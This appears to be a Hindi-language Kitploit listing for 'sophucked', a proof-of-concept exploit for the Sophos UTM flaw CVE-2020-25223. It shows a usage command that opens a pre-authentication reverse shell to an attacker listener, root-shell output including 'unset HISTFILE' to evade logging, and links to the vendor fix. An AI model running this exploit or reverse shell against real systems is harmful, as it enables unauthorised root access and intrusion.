Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
sophucked — CVE-2020-25223 | Kitploit
उपकरण/GitHubGitHub/darrenmartyn/sophucked
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubdarrenmartyn/sophucked

sophucked

CVE-2020-25223

रिपॉजिटरी देखें
1114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

sophucked

CVE-2020-25223 RCE PoC, रिवर्स शेल प्राप्त करता है। प्री-ऑथ। इसे जल्दी से लागू किया गया क्योंकि कुछ खतरे वाले मैग्नेट को एकीकृत करने की आवश्यकता थी।

उपयोग उदाहरण:

root@kitploit:~
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
# 

स्कैनिंग/डिटेक्शन

इसमें लागू नहीं किया गया है, बस nuclei टेम्पलेट का उपयोग करें।

पोस्ट-एक्सप्लॉइटेशन नोट्स

इनमें एक पायथन इंटरप्रेटर है, और वास्तव में एक बहुत ही पूर्ण विशेषताओं वाला लिनक्स वातावरण उपलब्ध है। पोस्ट-एक्सप्लॉइटेशन के लिए अद्भुत क्षमता।

ब्लू टीम नोट्स

मुझे यकीन है कि कोई परवाह करने वाला व्यक्ति इसे भर सकता है। Bitter ('ब्लू टीम ट्विटर' का एक उपसमूह) शायद जल्द ही ऐसा करेगा। मेरा मतलब है, यह पता लगाना इतना मुश्किल नहीं हो सकता कि आपके Unified Threat Manager बॉक्स से एक अनएन्क्रिप्टेड रिवर्स शेल बीकनिंग आउट कर रहा है, है ना?

बग को ठीक करना

किसी (संभवतः Sophos से) ने यह भेजा है, यह आधिकारिक फिक्स लिंक है। अपने UTM को अपडेट करें। https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce

संदर्भ, आदि।

तृतीय पक्ष संदर्भ (बग विवरण): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

सीधे Sophos से शिकायत करें, जिन्होंने किसी तरह 21वीं सदी में Perl में open() में उपयोगकर्ता इनपुट पास करना एक अच्छा विचार समझा।

टूल डाउनलोड करें